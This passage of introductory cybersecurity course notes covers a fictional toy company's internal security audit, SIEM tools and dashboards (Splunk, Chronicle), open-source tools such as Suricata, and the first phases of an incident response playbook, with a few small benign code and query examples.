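# Hypothetical sketch: an audit checklist as a dict of control -> implemented?
# Control names and answers below are invented for illustration only.

def summarize_checklist(checklist):
    """Count how many controls are in place and list the gaps to remediate."""
    in_place = [name for name, implemented in checklist.items() if implemented]
    gaps = [name for name, implemented in checklist.items() if not implemented]
    return {"in_place": len(in_place), "gaps": gaps}

controls = {
    "Least privilege": False,
    "Disaster recovery plan": False,
    "Firewall": True,
    "Antivirus": True,
    "Encryption": False,
}

summary = summarize_checklist(controls)
print(f"{summary['in_place']}/{len(controls)} controls in place")
print("Remediate:", ", ".join(summary["gaps"]))
```

A real audit report would add per-control detail and remediation timelines, but the same yes/no structure underlies the checklist used later in this course.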
Key takeaways
In this reading you learned more about security audits, including what they are; why they’re conducted;
and the role of frameworks, controls, and compliance in audits.
Although there is much more to learn about security audits, this introduction is meant to support your
ability to complete an audit of your own for a self-reflection portfolio activity later in this course.
Resources for more information
Resources that you can explore to further develop your understanding of audits in the cybersecurity
space are:
● Assessment and Auditing Resources
● IT Disaster Recovery Plan – Ready.gov, a government website for planning for all types of emergencies
Portfolio Activity – Conduct a Security Audit
Activity Overview
In part one of this activity, you will conduct an internal security audit, which you can include in your
cybersecurity portfolio. To review the importance of building a professional portfolio and options for
creating your portfolio, read Create a cybersecurity portfolio.
As a reminder, audits help ensure that security checks are made, to monitor for threats, risks, or
vulnerabilities that can affect an organization’s business continuity and critical assets.
Be sure to complete this activity and answer the questions that follow before moving on. The next
course item will provide you with a completed exemplar to compare to your own work.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
This scenario is based on a fictional company:
Botium Toys is a small U.S. business that develops and sells toys. The business has a single physical
location, which serves as their main office, a storefront, and warehouse for their products. However,
Botium Toys’ online presence has grown, attracting customers in the U.S. and abroad. As a result, their
information technology (IT) department is under increasing pressure to support their online market
worldwide.
The manager of the IT department has decided that an internal IT audit needs to be conducted. She
expresses concerns about not having a solidified plan of action to ensure business continuity and
compliance, as the business grows. She believes an internal audit can help better secure the company’s
infrastructure and help them identify and mitigate potential risks, threats, or vulnerabilities to critical
assets. The manager is also interested in ensuring that they comply with regulations related to internally
processing and accepting online payments and conducting business in the European Union (E.U.).
The IT manager starts by implementing the National Institute of Standards and Technology
Cybersecurity Framework (NIST CSF), establishing an audit scope and goals, listing assets currently
managed by the IT department, and completing a risk assessment. The goal of the audit is to provide an
overview of the risks and/or fines that the company might experience due to the current state of their
security posture.
Your task is to review the IT manager’s scope, goals, and risk assessment report. Then, perform an
internal audit by completing a controls and compliance checklist.
Follow the instructions to complete each step of the activity. Then, answer the 5 questions at the end of
the activity before going to the next course item to compare your work to the completed exemplar.
Step 1: Access supporting materials
The following supporting materials will help you complete this activity. Keep materials open as you
proceed to the next steps.
To use the supporting materials for this course item, click the links.
Links to supporting materials:
● Botium Toys: Scope, goals, and risk assessment report
● Control categories
Step 2: Conduct the audit: Controls and compliance checklist
Botium Toys: Scope, goals, and risk assessment report
Scope and goals of the audit
Scope: The scope is defined as the entire security program at Botium Toys. This means
all assets need to be assessed alongside internal processes and procedures related to
the implementation of controls and compliance best practices.
Goals: Assess existing assets and complete the controls and compliance checklist to
determine which controls and compliance best practices need to be implemented to
improve Botium Toys’ security posture.
Current assets
Assets managed by the IT Department include:
● On-premises equipment for in-office business needs
● Employee equipment: end-user devices (desktops/laptops, smartphones),
remote workstations, headsets, cables, keyboards, mice, docking stations,
surveillance cameras, etc.
● Storefront products available for retail sale on site and online; stored in the
company’s adjoining warehouse
● Management of systems, software, and services: accounting,
telecommunication, database, security, ecommerce, and inventory
management
● Internet access
● Internal network
● Data retention and storage
● Legacy system maintenance: end-of-life systems that require human
monitoring
Risk assessment
Risk description
Currently, there is inadequate management of assets. Additionally, Botium Toys does
not have all of the proper controls in place and may not be fully compliant with U.S. and
international regulations and standards.
Control best practices
The first of the five functions of the NIST CSF is Identify. Botium Toys will need to
dedicate resources to identify assets so they can appropriately manage them.
Additionally, they will need to classify existing assets and determine the impact of the
loss of existing assets, including systems, on business continuity.
Risk score
On a scale of 1 to 10, the risk score is 8, which is fairly high. This is due to a lack of
controls and adherence to compliance best practices.
Additional comments
The potential impact from the loss of an asset is rated as medium because the IT department does
not know which assets would be at risk. The risk to assets or fines from governing bodies is high
because Botium Toys does not have all of the necessary controls in place and is not fully adhering to
best practices related to compliance regulations that keep critical data private/secure. Review the
following bullet points for specific details:
● Currently, all Botium Toys employees have access to internally stored data and may be able to
access cardholder data and customers’ PII/SPII.
● Encryption is not currently used to ensure confidentiality of customers’ credit card information
that is accepted, processed, transmitted, and stored locally in the company’s internal database.
● Access controls pertaining to least privilege and separation of duties have not been implemented.
● The IT department has ensured availability and integrated controls to ensure data integrity.
● The IT department has a firewall that blocks traffic based on an appropriately defined set of
security rules.
● Antivirus software is installed and monitored regularly by the IT department.
● The IT department has not installed an intrusion detection system (IDS).
● There are no disaster recovery plans currently in place, and the company does not have backups
of critical data.
● The IT department has established a plan to notify E.U. customers within 72 hours if there is a
security breach. Additionally, privacy policies, procedures, and processes have been developed and
are enforced among IT department members/other employees, to properly document and maintain
data.
● Although a password policy exists, its requirements are nominal and not in line with current minimum password complexity requirements (e.g., at least eight characters, including a combination of letters, at least one number, and at least one special character).
● There is no centralized password management system that enforces the password policy’s
minimum requirements, which sometimes affects productivity when employees/vendors submit a
ticket to the IT department to recover or reset a password.
● While legacy systems are monitored and maintained, there is no regular schedule in place for
these tasks and intervention methods are unclear.
● The store’s physical location, which includes Botium Toys’ main offices, store front, and
warehouse of products, has sufficient locks, up-to-date closed-circuit television (CCTV)
surveillance, as well as functioning fire detection and prevention systems.
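The password-policy gap noted in the report can be made concrete with a small check. This Python sketch is illustrative only: it encodes the minimum complexity requirements mentioned above (at least eight characters, letters, a number, and a special character), and the example passwords are invented:

```python
import string

def meets_policy(password: str) -> bool:
    """Check a password against the minimum complexity requirements
    described in the report: at least eight characters, with letters,
    at least one number, and at least one special character.
    (Illustrative thresholds only; real policies vary.)"""
    return (
        len(password) >= 8
        and any(c.isalpha() for c in password)
        and any(c.isdigit() for c in password)
        and any(c in string.punctuation for c in password)
    )

print(meets_policy("toys123"))      # too short, no special character -> False
print(meets_policy("B0tium!Toys"))  # meets all requirements -> True
```

A centralized password management system, as the report recommends, would enforce a rule like this automatically instead of relying on IT tickets.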
Pro Tip: Save a copy of your work
Finally, be sure to download and save a copy of your completed activity to your own device. You can
upload it to the portfolio platform of your choice, then share with potential employers to help
demonstrate your knowledge and experience.
What to Include in Your Response
Be sure to address the following elements in your completed activity:
Controls and compliance checklist
● “Yes” or “no” is selected to answer the question related to each control listed
● “Yes” or “no” is selected to answer the question related to each compliance best practice
● A recommendation is provided for the IT manager (optional)
Step 3: Assess your activity
The following is a self-assessment for your controls and compliance checklist. You will use these
statements to review your own work. The self-assessment process is an important part of the learning
experience because it allows you to objectively assess your security audit.
There are a total of 5 points possible for this activity and each statement is worth 1 point. The items
correspond to each step you completed for the activity.
To complete the self-assessment, first open your controls assessment and compliance checklist. Then
respond yes or no to each statement.
Asset: An item perceived as having value to an organization
Attack vectors: The pathways attackers use to penetrate security defenses
Authentication: The process of verifying who someone is
Authorization: The concept of granting access to specific resources in a system
Availability: The idea that data is accessible to those who are authorized to access it
Biometrics: The unique physical characteristics that can be used to verify a person’s identity
Confidentiality: The idea that only authorized users can access specific assets or data
Confidentiality, integrity, availability (CIA) triad: A model that helps inform how organizations consider
risk when setting up systems and security policies
Detect: A NIST core function related to identifying potential security incidents and improving
monitoring capabilities to increase the speed and efficiency of detections
Encryption: The process of converting data from a readable format to an encoded format
Identify: A NIST core function related to management of cybersecurity risk and its effect on an
organization’s people and assets
Integrity: The idea that the data is correct, authentic, and reliable
National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF): A voluntary
framework that consists of standards, guidelines, and best practices to manage cybersecurity risk
National Institute of Standards and Technology (NIST) Special Publication (S.P.) 800-53: A unified
framework for protecting the security of information systems within the U.S. federal government
Open Web Application Security Project/Open Worldwide Application Security Project (OWASP): A nonprofit organization focused on improving software security
Protect: A NIST core function used to protect an organization through the implementation of policies,
procedures, training, and tools that help mitigate cybersecurity threats
Recover: A NIST core function related to returning affected systems back to normal operation
Respond: A NIST core function related to making sure that the proper procedures are used to contain,
neutralize, and analyze security incidents, and implement improvements to the security process
Risk: Anything that can impact the confidentiality, integrity, or availability of an asset
Security audit: A review of an organization's security controls, policies, and procedures against a set of
expectations
Security controls: Safeguards designed to reduce specific security risks
Security frameworks: Guidelines used for building plans to help mitigate risk and threats to data and
privacy
Security posture: An organization’s ability to manage its defense of critical assets and data and react to
change
An accessible way to explain the concept of "security posture" is with a simple analogy:
"Imagine your digital life, whether it's your computer, smartphone, or even your email accounts, as a
castle. Your security posture is like the strength and readiness of your castle's defenses.
1. Strong Castle Walls: In a good security posture, your castle has strong walls, just like your devices
have strong passwords and security measures. These walls protect your personal information and data
from intruders.
2. Guards at the Gates: Your castle has guards at the gates who check everyone who wants to enter.
Similarly, your security posture includes measures like firewalls and antivirus software that guard your
digital "gates" to keep out cyber threats.
3. Locks on the Doors: You have locks on all the doors and windows of your castle to keep them secure.
In the digital world, encryption and secure login methods act like locks, ensuring only authorized users
can access your information.
4. Alarm System: If someone tries to break into your castle, an alarm goes off to alert you. In your digital
life, intrusion detection systems serve as alarms, letting you know if there's a security breach.
5. Regular Maintenance: Just like a castle needs regular upkeep to stay strong, your security posture
requires regular updates and patches to fix any weak spots or vulnerabilities.
So, your security posture is all about how well you've set up these defenses to protect your digital world.
A strong security posture means your castle is well-prepared to fend off digital threats, keeping your
personal information safe and secure."
Threat: Any circumstance or event that can negatively impact assets
Security information and event management (SIEM) dashboards
Logs and SIEM Tools – As a security analyst, one of your responsibilities might include analyzing
log data to mitigate and manage threats, risks, and vulnerabilities. As a reminder, a log is a record of
events that occur within an organization's systems and networks. Security analysts access a variety
of logs from different sources. Three common log sources include firewall logs, network logs, and
server logs. Let's explore each of these log sources in more detail. A firewall log is a record of
attempted or established connections for incoming traffic from the internet. It also includes
outbound requests to the internet from within the network. A network log is a record of all
computers and devices that enter and leave the network. It also records connections between
devices and services on the network. Finally, a server log is a record of events related to services
such as websites, emails, or file shares. It includes actions such as login, password, and username
requests. By monitoring logs, like the one shown here, security teams can identify vulnerabilities
and potential data breaches. Understanding logs is important because SIEM tools rely on logs to
monitor systems and detect security threats. A security information and event management, or SIEM,
tool is an application that collects and analyzes log data to monitor critical activities in an
organization. It provides real-time visibility, event monitoring and analysis, and automated alerts. It
also stores all log data in a centralized location. Because SIEM tools index and minimize the number
of logs a security professional must manually review and analyze, they increase efficiency and save
time. But, SIEM tools must be configured and customized to meet each organization's unique
security needs. As new threats and vulnerabilities emerge, organizations must continually
customize their SIEM tools to ensure that threats are detected and quickly addressed. Later in the
certificate program, you'll have a chance to practice using different SIEM tools to identify potential
security incidents.
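As a rough illustration of the log analysis described above, the sketch below parses a few invented firewall log lines and tallies denied inbound connections per source IP. The log format here is hypothetical; real firewall logs vary by vendor, and in practice the SIEM tool performs this parsing at scale:

```python
# Hypothetical sketch: the log format below is invented for illustration;
# real firewall logs differ by vendor and are normally parsed by the SIEM.
from collections import Counter

log_lines = [
    "2023-11-01 09:14:02 ALLOW inbound 198.51.100.7 -> 10.0.0.5:443",
    "2023-11-01 09:14:05 DENY inbound 203.0.113.9 -> 10.0.0.5:22",
    "2023-11-01 09:14:09 DENY inbound 203.0.113.9 -> 10.0.0.5:22",
]

def count_denied_sources(lines):
    """Tally how many inbound connections each source IP had denied."""
    denied = Counter()
    for line in lines:
        fields = line.split()
        if fields[2] == "DENY":
            source_ip = fields[4]
            denied[source_ip] += 1
    return denied

print(count_denied_sources(log_lines))  # Counter({'203.0.113.9': 2})
```

Repeated denials from one source, as in this toy data, are exactly the kind of pattern an analyst would investigate further.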
SIEM Dashboards
SIEM tools can also be used to create dashboards. You might have
encountered dashboards in an app on your phone or other device. They present information
about your account or location in a format that's easy to understand. For example, weather apps
display data like temperature, precipitation, wind speed, and the forecast using charts, graphs, and
other visual elements. This format makes it easy to quickly identify weather patterns and trends, so
you can stay prepared and plan your day accordingly. Just like weather apps help people make
quick and informed decisions based on data, SIEM dashboards help security analysts quickly and
easily access their organization's security information as charts, graphs, or tables. For example, a
security analyst receives an alert about a suspicious login attempt. The analyst accesses their SIEM
dashboard to gather information about this alert. Using the dashboard, the analyst discovers that
there have been 500 login attempts for Ymara's account in the span of five minutes. They also
discover that the login attempts happened from geographic locations outside of Ymara's usual
location and outside of her usual working hours. By using a dashboard, the security analyst was
able to quickly review visual representations of the timeline of the login attempts, the location, and
the exact time of the activity, then determine that the activity was suspicious. In addition to
providing a comprehensive summary of security-related data, SIEM dashboards also provide
stakeholders with different metrics. Metrics are key technical attributes such as response time,
availability, and failure rate, which are used to assess the performance of a software application.
SIEM dashboards can be customized to display specific metrics or other data that are relevant to
different members in an organization. For example, a security analyst may create a dashboard that
displays metrics for monitoring everyday business operations, like the volume of incoming and
outgoing network traffic. We've examined how security analysts use SIEM dashboards to help
organizations maintain their security posture.
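The suspicious-login scenario above can be sketched as a simple detection rule: flag an account when login attempts within a time window exceed a threshold. The threshold, window, and timestamps below are invented for illustration; a real SIEM applies far richer correlation logic (geolocation, working hours, device fingerprints):

```python
# Hypothetical sketch of a SIEM-style alert rule. Threshold and window
# values are invented for illustration only.
from datetime import datetime, timedelta

def is_suspicious(attempt_times, max_attempts=10, window=timedelta(minutes=5)):
    """Return True if more than max_attempts logins fall inside any window."""
    times = sorted(attempt_times)
    start = 0
    for end in range(len(times)):
        # Slide the window start forward until it fits within the window.
        while times[end] - times[start] > window:
            start += 1
        if end - start + 1 > max_attempts:
            return True
    return False

base = datetime(2023, 11, 1, 2, 0)  # 2:00 a.m., outside usual working hours
burst = [base + timedelta(seconds=i) for i in range(500)]  # 500 attempts
print(is_suspicious(burst))  # True
```

In the scenario from the lesson, 500 attempts in five minutes would trip this rule immediately; a handful of normal logins spread across a day would not.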
The future of SIEM tools
Previously, you were introduced to security information and event management (SIEM) tools, along
with a few examples of SIEM tools. In this reading, you will learn more about how SIEM tools are used to
protect organizational operations. You will also gain insight into how and why SIEM tools are changing
to help protect organizations and the people they serve from evolving threat actor tactics and
techniques.
Current SIEM solutions
A SIEM tool is an application that collects and analyzes log data to monitor critical activities in an
organization. SIEM tools offer real-time monitoring and tracking of security event logs. The data is then
used to conduct a thorough analysis of any potential security threat, risk, or vulnerability identified.
SIEM tools have many dashboard options. Each dashboard option helps cybersecurity team members
manage and monitor organizational data. However, currently, SIEM tools require human interaction for
analysis of security events.
The future of SIEM tools
As cybersecurity continues to evolve, the need for cloud functionality has increased. SIEM tools have and
continue to evolve to function in cloud-hosted and cloud-native environments. Cloud-hosted SIEM tools
are operated by vendors who are responsible for maintaining and managing the infrastructure required
to use the tools. Cloud-hosted tools are simply accessed through the internet and are an ideal solution
for organizations that don’t want to invest in creating and maintaining their own infrastructure.
The difference between cloud-hosted SIEM (Security Information and Event Management) tools and
cloud-native SIEM tools lies in how they are deployed and where they primarily operate. Let's break
down the distinctions:
Cloud-Hosted SIEM Tools:
1. Deployment Location: Cloud-hosted SIEM tools are typically traditional SIEM solutions that were originally designed for on-premises deployment but have been adapted to run in a cloud environment. They are hosted on cloud servers, but they were not originally built with the cloud in mind.
2. Scalability: Cloud-hosted SIEM tools may offer some degree of scalability because they can leverage cloud resources. However, their architecture might not be optimized for the dynamic scaling and flexibility that native cloud services offer.
3. Maintenance: The vendor maintains and manages the underlying infrastructure, although organizations may retain more responsibility for configuration and tuning than they would with a fully managed cloud-native service.
4. Integration: They may require additional configuration and integration effort to work seamlessly with other cloud-native services and applications.
5. Cost Structure: Pricing for cloud-hosted SIEM tools may involve a combination of licensing fees, subscription costs, and cloud infrastructure charges, making cost management more complex.
Cloud-Native SIEM Tools:
1. Built for the Cloud: Cloud-native SIEM tools are purpose-built to operate in cloud environments from the ground up. They are designed to take full advantage of the cloud's scalability and flexibility.
2. Scalability: These tools can easily scale up or down based on demand, allowing organizations to pay only for the resources they use, which is a cost-effective approach.
3. Managed Services: Cloud-native SIEM solutions are often offered as managed services by cloud providers, which means the provider handles infrastructure management, software updates, and security patches, reducing the operational burden on users.
4. Integration: They are inherently well integrated with other cloud services and applications, making it easier to correlate security events and data from various sources within the cloud environment.
5. Cost Efficiency: Cloud-native SIEM tools typically offer more transparent and predictable pricing structures, often based on usage, which can simplify cost management.
In summary, the key difference between cloud-hosted and cloud-native SIEM tools is their origin and design. Cloud-hosted SIEM tools are adapted from traditional on-premises solutions to operate in the cloud, while cloud-native SIEM tools are purpose-built for the cloud, offering greater scalability, integration, and managed services. Organizations should consider their specific needs and cloud environment when choosing between these two options.
Similar to cloud-hosted SIEM tools, cloud-native SIEM tools are also fully maintained and managed by
vendors and accessed through the internet. However, cloud-native tools are designed to take full
advantage of cloud computing capabilities, such as availability, flexibility, and scalability.
Yet, the evolution of SIEM tools is expected to continue in order to accommodate the changing nature of
technology, as well as new threat actor tactics and techniques. For example, consider the current
development of interconnected devices with access to the internet, known as the Internet of Things
(IoT). The more interconnected devices there are, the larger the cybersecurity attack surface and the
amount of data that threat actors can exploit. The diversity of attacks and data that require special
attention is expected to grow significantly. Additionally, as artificial intelligence (AI) and machine
learning (ML) technology continues to progress, SIEM capabilities will be enhanced to better identify
threat-related terminology, dashboard visualization, and data storage functionality.
The implementation of automation will also help security teams respond faster to possible incidents,
performing many actions without waiting for a human response. Security orchestration, automation, and
response (SOAR) is a collection of applications, tools, and workflows that uses automation to respond to
security events. Essentially, this means that handling common security-related incidents with the use of
SIEM tools is expected to become a more streamlined process requiring less manual intervention. This
frees up security analysts to handle more complex and uncommon incidents that, consequently, can’t be
automated with a SOAR. Nevertheless, the expectation is for cybersecurity-related platforms to
communicate and interact with one another. Although the technology allowing interconnected systems
and devices to communicate with each other exists, it is still a work in progress.
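The SOAR idea, automated handling of common incidents with escalation of uncommon ones, can be sketched in a few lines. The alert types and response actions below are hypothetical examples, not any real product's playbook:

```python
# Hypothetical SOAR-style sketch: a playbook maps common SIEM alert types
# to automated responses; anything unrecognized is escalated to an analyst.
# Alert names and actions are invented for illustration only.

PLAYBOOK = {
    "brute_force_login": "lock account and require password reset",
    "known_malware_hash": "quarantine file and isolate host",
}

def handle_alert(alert_type):
    """Run the automated response if one exists, else escalate."""
    action = PLAYBOOK.get(alert_type)
    if action is None:
        return "escalated to security analyst"
    return f"automated: {action}"

print(handle_alert("brute_force_login"))
# automated: lock account and require password reset
print(handle_alert("zero_day_exploit"))
# escalated to security analyst
```

This split mirrors the text: routine incidents are handled without waiting for a human, freeing analysts for the complex cases automation cannot cover.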
Key takeaways
SIEM tools play a major role in monitoring an organization’s data. As an entry-level security analyst, you
might monitor SIEM dashboards as part of your daily tasks. Regularly researching new developments in
SIEM technology will help you grow and adapt to the changes in the cybersecurity field. Cloud
computing, SIEM-application integration, and automation are only some of the advancements security
professionals can expect in the future evolution of SIEM tools.
Explore common SIEM tools
Let's discuss the different types of SIEM tools that organizations can choose from, based
on their unique security needs. Self-hosted SIEM tools require organizations to install, operate, and
maintain the tool using their own physical infrastructure, such as server capacity. These applications
are then managed and maintained by the organization's IT department, rather than a third-party
vendor. Self-hosted SIEM tools are ideal when an organization is required to maintain physical
control over confidential data. Alternatively, cloud-hosted SIEM tools are maintained and managed
by the SIEM providers, making them accessible through the internet. Cloud-hosted SIEM tools are
ideal for organizations that don't want to invest in creating and maintaining their own
infrastructure. Or, an organization can choose to use a combination of both self-hosted and cloud-hosted SIEM tools, known as a hybrid solution. Organizations might choose a hybrid SIEM solution
to leverage the benefits of the cloud while also maintaining physical control over confidential data.
Splunk Enterprise, Splunk Cloud, and Chronicle are common SIEM tools that many organizations
use to help protect their data and systems. Let's begin by discussing Splunk. Splunk is a data
analysis platform and Splunk Enterprise provides SIEM solutions. Splunk Enterprise is a self-hosted
tool used to retain, analyze, and search an organization's log data to provide security information
and alerts in real-time. Splunk Cloud is a cloud-hosted tool used
to collect, search, and monitor log data. Splunk Cloud is helpful for organizations running hybrid or
cloud-only environments, where some or all of the organization's services are in the cloud. Finally,
there's Google's Chronicle. Chronicle is a cloud-native tool designed to retain, analyze, and search
data. Chronicle provides log monitoring, data analysis, and data collection. Like cloud-hosted tools,
cloud-native tools are also fully maintained and managed by the vendor. But cloud-native tools are
specifically designed to take full advantage of cloud computing capabilities such as availability,
flexibility, and scalability. Because threat actors are frequently improving their strategies to
compromise the confidentiality, integrity, and availability of their targets, it's important for
organizations to use a variety of security tools to help defend against attacks. The SIEM tools we
just discussed are only a few examples of the tools available for security teams to use to help defend
their organizations.
More about cybersecurity tools
Previously, you learned about several tools that are used by cybersecurity team members to monitor for
and identify potential security threats, risks, and vulnerabilities. In this reading, you’ll learn more about
common open-source and proprietary cybersecurity tools that you may use as a cybersecurity
professional.
Open-source tools
Open-source tools are often free to use and can be user friendly. The objective of open-source tools is to
provide users with software that is built by the public in a collaborative way, which can result in the
software being more secure. Additionally, open-source tools allow for more customization by users,
resulting in a variety of new services built from the same open-source software package.
Software engineers create open-source projects to improve software and make it available for anyone to
use, as long as the specified license is respected. The source code for open-source projects is readily
available to users, as well as the training material that accompanies them. Having these sources readily
available allows users to modify and improve project materials.
Proprietary tools
Proprietary tools are developed and owned by a person or company, and users typically pay a fee for
usage and training. The owners of proprietary tools are the only ones who can access and modify the
source code. This means that users generally need to wait for updates to be made to the software, and at
times they might need to pay a fee for those updates. Proprietary software generally allows users to
modify a limited number of features to meet individual and organizational needs. Examples of
proprietary tools include Splunk® and Chronicle SIEM tools.
Common misconceptions
There is a common misconception that open-source tools are less effective and not as safe to use as
proprietary tools. However, developers have been creating open-source materials for years that have
become industry standards. Although it is true that threat actors have attempted to manipulate opensource tools, because these tools are open source it is harder for people with malicious intent to
successfully cause harm. The wide exposure and immediate access to the source code by wellintentioned and informed users and professionals makes it less likely for issues to occur, because they
can fix issues as soon as they’re identified.
Examples of open-source tools
In security, there are many tools in use that are open-source and commonly available. Two examples are
Linux and Suricata.
Linux
Linux is an open-source operating system that is widely used. It allows you to tailor the operating
system to your needs using a command-line interface. An operating system is the interface between
computer hardware and the user. It’s used to communicate with the hardware of a computer and
manage software applications.
There are multiple versions of Linux that exist to accomplish specific tasks. Linux and its command-line
interface will be discussed in detail later in the certificate program.
Suricata
Suricata is an open-source network analysis and threat detection software. Network analysis and threat
detection software is used to inspect network traffic to identify suspicious behavior and generate
network data logs. The detection software finds activity across users, computers, or Internet Protocol
(IP) addresses to help uncover potential threats, risks, or vulnerabilities.
Suricata was developed by the Open Information Security Foundation (OISF). OISF is dedicated to
maintaining open-source use of the Suricata project to ensure it’s free and publicly available. Suricata is
widely used in the public and private sectors, and it integrates with many SIEM tools and other security
tools. Suricata will also be discussed in greater detail later in the program.
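To give a feel for how Suricata describes suspicious traffic, here is a sketch of a rule in Suricata's signature format. The message text and sid value are made-up examples, not rules from the course materials:

```text
alert tcp any any -> any 22 (msg:"Possible SSH connection attempt"; sid:1000001; rev:1;)
```

A rule like this tells Suricata to generate an alert whenever it observes TCP traffic to port 22, which an analyst could then investigate.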
Key takeaways
Open-source tools are widely used in the cybersecurity profession. Throughout the certificate program,
you will have multiple opportunities to learn about and explore both open-source and proprietary tools
in more depth.
Use SIEM tools to protect organizations
Previously, you were introduced to security information and event management (SIEM) tools and a few
SIEM dashboards. You also learned about different threats, risks, and vulnerabilities an organization
may experience. In this reading, you will learn more about SIEM dashboard data and how cybersecurity
professionals use that data to identify a potential threat, risk, or vulnerability.
Splunk
Splunk offers different SIEM tool options: Splunk® Enterprise and Splunk® Cloud. Both allow you to
review an organization's data on dashboards. This helps security professionals manage an
organization's internal infrastructure by collecting, searching, monitoring, and analyzing log data from
multiple sources to obtain full visibility into an organization’s everyday operations.
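For a sense of what searching log data in Splunk looks like in practice, here is a sketch of a search in Splunk's Search Processing Language (SPL). The index name, sourcetype, and field name below are assumptions that vary by deployment:

```text
index=security sourcetype=linux_secure "failed password"
| stats count by src_ip
| sort - count
```

This hypothetical search counts failed password events by source IP address and sorts them so the most active sources appear first.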
Review the following Splunk dashboards and their purposes:
Security posture dashboard
The security posture dashboard is designed for security operations centers (SOCs). It displays the last
24 hours of an organization’s notable security-related events and trends and allows security
professionals to determine if security infrastructure and policies are performing as designed. Security
analysts can use this dashboard to monitor and investigate potential threats in real time, such as
suspicious network activity originating from a specific IP address.
Executive summary dashboard
The executive summary dashboard analyzes and monitors the overall health of the organization over
time. This helps security teams improve security measures that reduce risk. Security analysts might use
this dashboard to provide high-level insights to stakeholders, such as generating a summary of security
incidents and trends over a specific period of time.
Incident review dashboard
The incident review dashboard allows analysts to identify suspicious patterns that can occur in the
event of an incident. It assists by highlighting higher risk items that need immediate review by an
analyst. This dashboard can be very helpful because it provides a visual timeline of the events leading up
to an incident.
Risk analysis dashboard
The risk analysis dashboard helps analysts identify risk for each risk object (e.g., a specific user, a
computer, or an IP address). It shows changes in risk-related activity or behavior, such as a user logging
in outside of normal working hours or unusually high network traffic from a specific computer. A
security analyst might use this dashboard to analyze the potential impact of vulnerabilities in critical
assets, which helps analysts prioritize their risk mitigation efforts.
Chronicle
Chronicle is a cloud-native SIEM tool from Google that retains, analyzes, and searches log data to identify
potential security threats, risks, and vulnerabilities. Chronicle allows you to collect and analyze log data
according to:
● A specific asset
● A domain name
● A user
● An IP address
Chronicle provides multiple dashboards that help analysts monitor an organization’s logs, create filters
and alerts, and track suspicious domain names.
Review the following Chronicle dashboards and their purposes:
Enterprise insights dashboard
The enterprise insights dashboard highlights recent alerts. It identifies suspicious domain names in logs,
known as indicators of compromise (IOCs). Each result is labeled with a confidence score to indicate the
likelihood of a threat. It also provides a severity level that indicates the significance of each threat to the
organization. A security analyst might use this dashboard to monitor login or data access attempts
related to a critical asset—like an application or system—from unusual locations or devices.
Data ingestion and health dashboard
The data ingestion and health dashboard shows the number of event logs, log sources, and success rates
of data being processed into Chronicle. A security analyst might use this dashboard to ensure that log
sources are correctly configured and that logs are received without error. This helps ensure that
log-related issues are addressed so that the security team has access to the log data they need.
IOC matches dashboard
The IOC matches dashboard indicates the top threats, risks, and vulnerabilities to the organization.
Security professionals use this dashboard to observe domain names, IP addresses, and device IOCs over
time in order to identify trends. This information is then used to direct the security team’s focus to the
highest priority threats. For example, security analysts can use this dashboard to search for additional
activity associated with an alert, such as a suspicious user login from an unusual geographic location.
Main dashboard
The main dashboard displays a high-level summary of information related to the organization’s data
ingestion, alerting, and event activity over time. Security professionals can use this dashboard to access
a timeline of security events—such as a spike in failed login attempts—to identify threat trends across
log sources, devices, IP addresses, and physical locations.
Rule detections dashboard
The rule detections dashboard provides statistics related to incidents with the highest occurrences,
severities, and detections over time. Security analysts can use this dashboard to access a list of all the
alerts triggered by a specific detection rule, such as a rule designed to alert whenever a user opens a
known malicious attachment from an email. Analysts then use those statistics to help manage recurring
incidents and establish mitigation tactics to reduce an organization's level of risk.
User sign in overview dashboard
The user sign in overview dashboard provides information about user access behavior across the
organization. Security analysts can use this dashboard to access a list of all user sign-in events to identify
unusual user activity, such as a user signing in from multiple locations at the same time. This
information is then used to help mitigate threats, risks, and vulnerabilities to user accounts and the
organization’s applications.
Key takeaways
SIEM tools provide dashboards that help security professionals organize and focus their security efforts.
This is important because it allows analysts to reduce risk by identifying, analyzing, and remediating the
highest priority items in a timely manner. Later in the program, you’ll have an opportunity to practice
using various SIEM tool features and commands for search queries.
Glossary terms from module 3
Terms and definitions from Course 2, Module 3
Chronicle: A cloud-native tool designed to retain, analyze, and search data
Incident response: An organization’s quick attempt to identify an attack, contain the damage, and correct
the effects of a security breach
Log: A record of events that occur within an organization’s systems
Metrics: Key technical attributes such as response time, availability, and failure rate, which are used to
assess the performance of a software application
Operating system (OS): The interface between computer hardware and the user
Playbook: A manual that provides details about any operational action
Security information and event management (SIEM): An application that collects and analyzes log data to
monitor critical activities in an organization
Security orchestration, automation, and response (SOAR): A collection of applications, tools, and
workflows that use automation to respond to security events
Splunk Cloud: A cloud-hosted tool used to collect, search, and monitor log data
Splunk Enterprise: A self-hosted tool used to retain, analyze, and search an organization's log data to
provide security information and alerts in real time
Phases of Incident Response Playbooks
We discussed security information and event management, or SIEM tools, and how they can be used
to help organizations improve their security posture. Let's continue our security
journey by exploring another tool security professionals use: playbooks. In this section, we'll
explore how playbooks help security teams respond to threats, risks, or vulnerabilities identified by
SIEM tools. We'll introduce another important tool for maintaining an organization's security,
known as a playbook. A playbook is a manual that provides details about any operational action.
Playbooks also clarify what tools should be used in response to a security incident. In the security
field, playbooks are essential. Urgency, efficiency, and accuracy are necessary to quickly identify
and mitigate a security threat to reduce potential risk. Playbooks ensure that people follow a
consistent list of actions in a prescribed way, regardless of who is working on the case. Different
types of playbooks are used. These include playbooks for incident response, security alerts, team-specific, and product-specific purposes. Here, we'll focus on a playbook that's commonly used in
cybersecurity, called an incident response playbook. Incident response is an organization's quick
attempt to identify an attack, contain the damage, and correct the effects of a security breach. An
incident response playbook is a guide with six phases used to help mitigate and manage security
incidents from beginning to end. Let's discuss each phase.
The first phase is preparation. Organizations must prepare to mitigate the likelihood, risk, and
impact of a security incident by documenting procedures, establishing staffing plans, and educating
users. Preparation sets the foundation for successful incident response. For example, organizations
can create incident response plans and procedures that outline the roles and responsibilities of
each security team member.
The second phase is detection and analysis. The objective of this phase is to detect and analyze
events using defined processes and technology. Using appropriate tools and strategies during this
phase helps security analysts determine whether a breach has occurred and analyze its possible
magnitude.
The third phase is containment. The goal of containment is to prevent further damage and reduce
the immediate impact of a security incident. During this phase, security
professionals take actions to contain an incident and minimize damage. Containment is a high
priority for organizations because it helps prevent ongoing risks to critical assets and data.
The fourth phase in an incident response playbook is eradication and recovery. This phase involves
the complete removal of an incident's artifacts so that an organization can return to normal
